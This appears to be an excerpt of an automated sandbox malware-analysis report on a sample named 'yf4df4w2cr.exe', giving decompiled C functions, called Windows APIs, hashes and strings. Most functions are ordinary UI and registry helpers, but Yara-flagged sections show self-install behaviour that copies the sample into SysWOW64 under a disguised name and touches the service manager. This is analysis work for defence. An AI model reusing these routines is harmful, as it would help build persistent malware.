                  						if((0x00000001 -  *((intOrPtr*)( *_t49 - 0x10 + 0xc)) |  *((intOrPtr*)( *_t49 - 0x10 + 8)) - _t72) < 0) {
                  							_push(_t72);
                  							E00401470(_t49, _t49, _t67);
                  						}
                  						_t53 =  *_t49;
                  						_t60 =  *_t67 & 0x0000ffff;
                  						WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, _t53, _t72, 0, 0);
                  						_pop(_t76);
                  						if(_t72 < 0) {
                  							L8:
                  							E00401090(_t53, _t60, 0x80070057);
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							_push(_t49);
                  							_push(_t72);
                  							_t73 = _v8;
                  							_t50 = _t53;
                  							if(_t73 != 0) {
                  								_t54 = _v12;
                  								if(_t54 == 0) {
                  									L12:
                  									E00401090(_t54, _t60, 0x80070057);
                  								}
                  								_t35 =  *_t50;
                  								_t77 =  *((intOrPtr*)(_t35 - 0xc));
                  								_push(_t67);
                  								_t69 = _t54 - _t35;
                  								_t60 = 0x00000001 -  *((intOrPtr*)(_t35 - 4)) |  *((intOrPtr*)(_t35 - 8)) - _t73;
                  								if(1 < 0) {
                  									_push(_t73);
                  									E00401470(_t50, _t50, _t69);
                  									_t54 = _v16;
                  								}
                  								_t38 =  *_t50;
                  								_push(_t73);
                  								if(_t69 > _t77) {
                  									_push(_t54);
                  									_t54 =  *(_t38 - 8);
                  									_push(_t54);
                  									_push(_t38);
                  									E0043065F(_t50, _t54);
                  								} else {
                  									_t60 =  *(_t38 - 8);
                  									_t54 = _t38 + _t69;
                  									_push(_t54);
                  									_push( *(_t38 - 8));
                  									_push(_t38);
                  									E00430B25(_t50);
                  								}
                  								_t79 = _t79 + 0x10;
                  								_pop(_t67);
                  								_pop(_t76);
                  								if(_t73 < 0) {
                  									goto L12;
                  								}
                  								_t41 =  *_t50;
                  								if(_t73 >  *((intOrPtr*)(_t41 - 8))) {
                  									goto L12;
                  								}
                  								 *((intOrPtr*)(_t41 - 0xc)) = _t73;
                  								 *((char*)(_t73 +  *_t50)) = 0;
                  								return _t41;
                  							} else {
                  								return E00401E30(_t53);
                  							}
                  						} else {
                  							_t45 =  *_t49;
                  							if(_t72 >  *((intOrPtr*)(_t45 - 8))) {
                  								goto L8;
                  							} else {
                  								 *(_t45 - 0xc) = _t72;
                  								( *_t49)[_t72] = 0;
                  								return 1;
                  							}
                  						}
                  					} else {
                  						goto L2;
                  					}
                  				}
                  			}

                  APIs
                  • FindResourceA.KERNEL32(?,?,00000006), ref: 0040251A
                    • Part of subcall function 004019E0: LoadResource.KERNEL32(?,?,?,?,0040252C,?,00000000,?,?,00402740,00000000,?,?,?,?,0040AD0B), ref: 004019EC
                  • WideCharToMultiByte.KERNELBASE(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 00402552
                  • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000), ref: 00402589
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharMultiResourceWide$FindLoad
                  • String ID:
                  • API String ID: 861045882-0
                  • Opcode ID: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction ID: ab90c26927212f4ee8fca040aa4f0871524c501861b284741b334b9420958e70
                  • Opcode Fuzzy Hash: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction Fuzzy Hash: 4221A5323412107FE3219B5ADC89F6777ACEB85750F11416AF540EB2D4D6B8AC5187A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00414B9C(intOrPtr __ecx) {
                  				void* _v8;
                  				char _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				int _v24;
                  				long _t29;
                  				char* _t30;
                  				intOrPtr _t32;
                  				char** _t34;
                  				signed int _t39;
                  				char** _t43;
                  				char* _t45;
                  
                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
                  				_v20 = __ecx;
                  				_v8 = 0;
                  				_v12 = 0;
                  				_v24 = 4;
                  				_v16 = 0;
                  				_t34 = 0x462ba0;
                  				_t45 =  *0x462ba0; // 0x451b18
                  				if(_t45 == 0) {
                  					L14:
                  					return 1;
                  				}
                  				do {
                  					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
                  					if(_t29 != 0) {
                  						goto L12;
                  					}
                  					_t8 =  &(_t34[1]); // 0x462bc0
                  					_t43 =  *_t8;
                  					while(1) {
                  						_t30 =  *_t43;
                  						if(_t30 == 0) {
                  							break;
                  						}
                  						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                  							_t14 =  &(_t43[1]); // 0x1
                  							_t39 =  *_t14;
                  							_t32 = _v20;
                  							if(_v12 == 0) {
                  								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
                  							} else {
                  								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
                  							}
                  						}
                  						_v12 = 0;
                  						_v24 = 4;
                  						_v16 = 0;
                  						_t43 =  &(_t43[2]);
                  					}
                  					RegCloseKey(_v8);
                  					_v8 = 0;
                  					L12:
                  					_t34 =  &(_t34[2]);
                  				} while ( *_t34 != 0);
                  				goto L14;
                  			}

                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,00462BA0,00000000,00000001,?), ref: 00414BE1
                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00414C01
                  • RegCloseKey.ADVAPI32(?), ref: 00414C45
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction ID: 0d605141b2b3a1f8deb0ee767be3a254aedc986605f7b564ed76e2b6a05936f2
                  • Opcode Fuzzy Hash: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction Fuzzy Hash: 8A2149B1D01208EFDB14CF86D944AEEFBF8FF91701F2144AAE415A6210E3B59A40CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00426574(void* __ecx, int _a4, CHAR* _a8, int _a12) {
                  				char _v8;
                  				int _v12;
                  				int _t14;
                  				long _t19;
                  				void* _t27;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x68)); // executed
                  				} else {
                  					_t27 = E0042652C(__ecx, _a4);
                  					if(_t27 != 0) {
                  						_a4 = 4;
                  						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4);
                  						RegCloseKey(_t27);
                  						if(_t19 != 0) {
                  							goto L2;
                  						} else {
                  							_t14 = _v8;
                  						}
                  					} else {
                  						L2:
                  						_t14 = _a12;
                  					}
                  				}
                  				return _t14;
                  			}

                  APIs
                  • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004265AF
                  • RegCloseKey.ADVAPI32(00000000), ref: 004265B8
                  • GetPrivateProfileIntA.KERNEL32 ref: 004265D4
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileQueryValue
                  • String ID:
                  • API String ID: 1423431592-0
                  • Opcode ID: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction ID: 359547d3396ca64b357bdbba5d42c68a2efe29caa3992aa9148c66dea141a309
                  • Opcode Fuzzy Hash: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction Fuzzy Hash: FC014676201128FBCB128F50EC04EDF3BB9FF49354F11402AF9059A154DB79EA95DBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040CC1D(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16, signed int _a20) {
                  				signed int _t9;
                  				signed int _t11;
                  				long _t20;
                  
                  				_t9 = GetWindowLongA(_a4, _a8);
                  				_t20 =  !_a12 & _t9 | _a16;
                  				if(_t9 != _t20) {
                  					SetWindowLongA(_a4, _a8, _t20); // executed
                  					_t11 = _a20;
                  					if(_t11 != 0) {
                  						SetWindowPos(_a4, 0, 0, 0, 0, 0, _t11 | 0x00000017);
                  					}
                  					return 1;
                  				}
                  				return 0;
                  			}

                  APIs
                  • GetWindowLongA.USER32 ref: 0040CC28
                  • SetWindowLongA.USER32 ref: 0040CC47
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,0040CC87,?,000000F0,?,?,?,?,00412B88), ref: 0040CC62
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction ID: 8d151290716614a4af326467620842b1de0e6c172b2ec37ab7e21d59d9d88d99
                  • Opcode Fuzzy Hash: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction Fuzzy Hash: 93F08C75120008FFEF088F71DC998AE3B69FB18312B404539F80AC5160DB31DC61DA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 023ECE90: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,023ED662,00000102,023EAC19,?,023EAC8F), ref: 023ECE99
                    • Part of subcall function 023ECE90: CloseServiceHandle.ADVAPI32(00000000,?,023EAC8F), ref: 023ECEAE
                    • Part of subcall function 023ECE6E: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yf4df4w2cr.exe,00000104,?,00000102,023ED667,00000102,023EAC19,?,023EAC8F), ref: 023ECE87
                    • Part of subcall function 023ED0EA: CreateFileW.KERNELBASE(C:\Users\user\Desktop\yf4df4w2cr.exe,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED0FF
                    • Part of subcall function 023ED0EA: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED114
                    • Part of subcall function 023ED0EA: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED126
                    • Part of subcall function 023ED0EA: GetFileSize.KERNEL32(00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED135
                    • Part of subcall function 023ED0EA: UnmapViewOfFile.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED14B
                    • Part of subcall function 023ED0EA: FindCloseChangeNotification.KERNELBASE(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED152
                    • Part of subcall function 023ED0EA: CloseHandle.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED159
                    • Part of subcall function 023ED163: GetComputerNameW.KERNEL32(?,?), ref: 023ED179
                    • Part of subcall function 023ED163: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 023ED1A6
                    • Part of subcall function 023ED013: DeleteFileW.KERNELBASE(?), ref: 023ED0DD
                  • lstrcmpiW.KERNEL32(C:\Users\user\Desktop\yf4df4w2cr.exe,C:\Windows\SysWOW64\fwdrrebrand.exe,00000102,023EAC19,?,023EAC8F), ref: 023ED68B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Close$CreateHandleNameView$ByteChangeCharComputerDeleteFindManagerMappingModuleMultiNotificationOpenServiceSizeUnmapWidelstrcmpi
                  • String ID: C:\Users\user\Desktop\yf4df4w2cr.exe$C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 3833967445-615456372
                  • Opcode ID: c8b25010dfd696d3d4755c6d91f75331de6b9ed52a0a97198c81cfa6a7479143
                  • Instruction ID: a826fe385200487ca9e7c6880e6adc8f1bc770dfa9821c5f826febc770f71b7b
                  • Opcode Fuzzy Hash: c8b25010dfd696d3d4755c6d91f75331de6b9ed52a0a97198c81cfa6a7479143
                  • Instruction Fuzzy Hash: 2FF0A7A5E54238DAEEB8BBF9740475E234F4F50B20F144817E54B811C5DF70584E8D66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00412D87(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				int _t22;
                  				int _t24;
                  				void* _t36;
                  				void* _t38;
                  
                  				_push(4);
                  				E00431A9B(E0044BD4B, __ebx, __edi, __esi);
                  				_t36 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
                  					E004014C0(_t38 - 0x10, __edx);
                  					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x50)))) + 0x8c))(_t38 - 0x10);
                  					E004048ED(__ebx,  *((intOrPtr*)(_t36 + 0x50)), __edi, _t36,  *(_t38 + 8),  *(_t38 + 0xc),  *((intOrPtr*)(_t38 - 0x10)), 0xffffffff);
                  					_t22 = lstrlenA( *(_t38 + 8));
                  					E004010B0( *((intOrPtr*)(_t38 - 0x10)) + 0xfffffff0, _t38 - 0x10);
                  					_t24 = _t22;
                  				} else {
                  					_t24 = GetWindowTextA( *(__ecx + 0x20),  *(_t38 + 8),  *(_t38 + 0xc)); // executed
                  				}
                  				return E00431B73(_t24);
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3TextWindowlstrlen
                  • String ID:
                  • API String ID: 3549226942-0
                  • Opcode ID: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction ID: c23bc98a17ab587e4b111167bb2d42125b64d8fed7f86c3939704ddc0647063a
                  • Opcode Fuzzy Hash: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction Fuzzy Hash: 40011D35400214EFCF01AFA5CC49EAE7B71BF04328F008A69F5255A2B1DB759961DB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetTickCount.KERNEL32 ref: 023EAC51
                    • Part of subcall function 023EA88E: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 023EA8A3
                    • Part of subcall function 023EA88E: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,023F0D98,00000000,00000000,00000000,00000000), ref: 023EA8E6
                    • Part of subcall function 023EA9FC: WaitForSingleObject.KERNEL32(00000000,?,00000000,023EAC6C), ref: 023EAA10
                    • Part of subcall function 023EA9FC: SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,023EAC6C), ref: 023EAA44
                    • Part of subcall function 023EA9FC: ResetEvent.KERNEL32(?,00000000,023EAC6C), ref: 023EAA58
                    • Part of subcall function 023EA9FC: ReleaseMutex.KERNEL32(?,00000000,023EAC6C), ref: 023EAA66
                    • Part of subcall function 023EA9FC: CloseHandle.KERNEL32(?,00000000,023EAC6C), ref: 023EAA72
                  • WaitForSingleObject.KERNEL32(00000FA0), ref: 023EAC7D
                  • WaitForSingleObject.KERNEL32(00000000), ref: 023EAC96
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: ObjectWait$Single$CloseCountDirectoryEventHandleInformationMutexReleaseResetSignalTickVolumeWindows
                  • String ID:
                  • API String ID: 1052563600-0
                  • Opcode ID: 58f141778b64f99be8d601665060432e944aa389585edb9b3be52f2b427669f3
                  • Instruction ID: 2ea87b503bdf96a39e2d604dbec0fce22db93252f35da89694c655f02d2e72b3
                  • Opcode Fuzzy Hash: 58f141778b64f99be8d601665060432e944aa389585edb9b3be52f2b427669f3
                  • Instruction Fuzzy Hash: 77E02BB09441209BDB682728BC088BA779FFB04311F8546B5FD5FD11C9DF106C288DE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E00404CF2(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t12;
                  				signed int _t16;
                  				void* _t17;
                  				struct HWND__* _t19;
                  				signed int _t24;
                  				signed int _t27;
                  				void* _t38;
                  				signed int _t44;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t12 = _a8;
                  				_t38 = __ecx;
                  				_t27 = 0x56000001;
                  				if(_t12 != 0) {
                  					_v12 =  *((intOrPtr*)(_t12 + 4));
                  				} else {
                  					_v12 = 0;
                  				}
                  				_t16 =  *(_a4 + 0x20) & 0x00300000;
                  				_v8 = 0xff00;
                  				if(_t16 != 0) {
                  					_t24 = _t16 | 0x56000001;
                  					_t44 = _t24;
                  					_t27 = _t24;
                  					E00412B6C(_t38, 0x300000, 0, 0x28);
                  				}
                  				_t17 = E0041F363(_t27, 0, _t38, _t44);
                  				_push( &_v12);
                  				_push( *((intOrPtr*)(_t17 + 8)));
                  				_push(0xe900);
                  				_push( *((intOrPtr*)(_t38 + 0x20)));
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(_t27);
                  				_push(0);
                  				_push("mdiclient");
                  				_push(0x200); // executed
                  				_t19 = E0040492C(_t27,  &_v12, 0, _t38, _t44); // executed
                  				 *(_t38 + 0xe8) = _t19;
                  				if(_t19 != 0) {
                  					BringWindowToTop(_t19);
                  					__eflags = 1;
                  					return 1;
                  				} else {
                  					return 0;
                  				}
                  			}


















                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: BringWindow
                  • String ID: mdiclient
                  • API String ID: 1361440306-1999401180
                  • Opcode ID: c63c0ab9442a39a1b7a5d865660d12e39dd1592865cc440c57b5c986c44ef623
                  • Instruction ID: 6620486015e60b6a059689b7e1a8a8747eecd99153f1f0efe6d475f075f97d44
                  • Opcode Fuzzy Hash: c63c0ab9442a39a1b7a5d865660d12e39dd1592865cc440c57b5c986c44ef623
                  • Instruction Fuzzy Hash: 8D11A0B1A102047BD7248BA6CC89E6BBAECEFD9714F10442AB505D72A1E5B498008624
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00407991(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, char _a16, intOrPtr _a32) {
                  				struct tagRECT _v20;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t17;
                  				void* _t24;
                  				signed int _t28;
                  				void* _t29;
                  				signed int* _t31;
                  				void* _t34;
                  				signed int _t40;
                  
                  				_t29 = __ebx;
                  				_t34 = __ecx;
                  				E00406AAE( &_a16);
                  				_t35 = _a12;
                  				_t17 = _a12 & 0x0040ffff;
                  				_t31 = __ecx + 0x84;
                  				 *_t31 = _t17;
                  				if(_a32 == 0xe800) {
                  					_t28 = _t17 | 0x00000008;
                  					_t40 = _t28;
                  					 *_t31 = _t28;
                  				}
                  				E00411F96(_t29, _t31, _t34, _t35, _t40, 0x1000); // executed
                  				E0040791D(_t31, _t34); // executed
                  				E004064F0(_t31); // executed
                  				SetRectEmpty( &_v20);
                  				_t24 = E0040D84A(_t34, "ToolbarWindow32", 0, _t35 & 0xffbf004e | _a8 | 0x0000004e,  &_v20, _a4, _a32, 0); // executed
                  				if(_t24 != 0) {
                  					E00406DB6(_t34,  *((intOrPtr*)(_t34 + 0xb0)),  *((intOrPtr*)(_t34 + 0xb4)),  *((intOrPtr*)(_t34 + 0xa8)),  *((intOrPtr*)(_t34 + 0xac)));
                  					return 1;
                  				}
                  				return _t24;
                  			}














                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyRect
                  • String ID: ToolbarWindow32
                  • API String ID: 2270935405-4104838417
                  • Opcode ID: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction ID: 505957d6a176a6e826c3b6042989fcaafd5f8927dda6a395bbae33c2c064a4d4
                  • Opcode Fuzzy Hash: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction Fuzzy Hash: 9C11A572710209BBDF11AFA1CC01BDA7B69FF85358F014436F915B61D1DB38A825CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040B954(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                  				struct tagRECT _v20;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t11;
                  				void* _t21;
                  				void* _t22;
                  				signed int _t29;
                  				void* _t32;
                  				signed int _t37;
                  
                  				_t22 = __ebx;
                  				_t11 = _a12;
                  				_t32 = __ecx;
                  				 *(__ecx + 0x84) = _t11 & 0x0040ffff;
                  				_t26 = _a4;
                  				_t29 = _t11 & 0xffbf004e | 0x0000004e;
                  				if((E00412B38(_a4) & 0x00040000) != 0) {
                  					_t37 = _t29;
                  				}
                  				E00411F96(_t22, _t26, _t29, _t32, _t37, 0x1000);
                  				SetRectEmpty( &_v20);
                  				_t21 = E0040D84A(_t32, "msctls_statusbar32", 0, _a8 | _t29,  &_v20, _a4, _a16, 0); // executed
                  				return _t21;
                  			}













                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SetRectEmpty.USER32(?), ref: 0040B99E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyLongRectWindow
                  • String ID: msctls_statusbar32
                  • API String ID: 2293799620-4095915827
                  • Opcode ID: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction ID: 468b7fd0b6eacb9e28decebd9ac57333f4eba2f844c003510548747924e0c593
                  • Opcode Fuzzy Hash: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction Fuzzy Hash: 36F0C87270024967DB10EFA9DC06FEB3799EB84754F04443AFA19E71C1CAB8E8548658
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041346C(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                  				struct tagRECT _v20;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t15;
                  				void* _t21;
                  
                  				_t20 = __edi;
                  				_t18 = __ecx;
                  				_t17 = __ebx;
                  				_t22 = _a4;
                  				_t21 = __ecx;
                  				if(_a4 == 0) {
                  					E00406436(__ebx, __ecx, __edi, __ecx, _t22);
                  				}
                  				_t10 = _a8 & 0x0040ffff;
                  				 *(_t21 + 0x84) = _a8 & 0x0040ffff;
                  				E00411F96(_t17, _t18, _t20, _t21, _t10, 2);
                  				SetRectEmpty( &_v20);
                  				_t15 = E0040D84A(_t21, "AfxControlBar90s", 0, _a8,  &_v20, _a4, _a12, 0); // executed
                  				return _t15;
                  			}









                  APIs
                  • SetRectEmpty.USER32(?), ref: 0041349B
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyException@8H_prolog3RectThrow
                  • String ID: AfxControlBar90s
                  • API String ID: 1106273639-4082281646
                  • Opcode ID: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction ID: 904d40750636b72848055661a794ad6f36defb35cdb82f78ac122cc83c2a69a9
                  • Opcode Fuzzy Hash: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction Fuzzy Hash: 49F0823250021ABBDF20AFA5CC06FDE3B69FB40314F10842BF914AA1C1DA7895548758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • DeleteFileW.KERNELBASE(?), ref: 023E1120
                  Strings
                  • C:\Windows\SysWOW64\fwdrrebrand.exe, xrefs: 023E10FD
                  Memory Dump Source
